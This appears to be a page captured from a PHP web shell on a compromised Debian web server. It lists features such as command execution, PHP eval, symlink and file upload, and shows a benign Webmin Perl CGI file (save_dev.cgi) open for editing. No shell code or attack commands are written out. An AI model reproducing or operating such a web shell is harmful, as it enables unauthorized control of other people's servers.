Home Files
Adminer
Execute Command
PHP Eval
Symlink
File Upload
Owner :
www-data
PHP Version
5.6.40-0+deb8u12
Disk Space
40.93 GB
Server Addr
19-www4
Your IP
10.10.10.40
Edit File
File:
#!/usr/bin/perl # save_dev.cgi # Save global device options require './burner-lib.pl'; $access{'global'} || &error($text{'dev_ecannot'}); &ReadParse(); &error_setup($text{'dev_err'}); $config{'dev'} = $in{'dev'}; if ($in{'speed'}) { $config{'speed'} = $in{'speed'}; } else { $in{'other'} =~ /^\d+$/ || &error($text{'dev_eother'}); $config{'speed'} = $in{'other'}; } $config{'extra'} = $in{'extra'}; &write_file("$module_config_directory/config", \%config); &redirect("");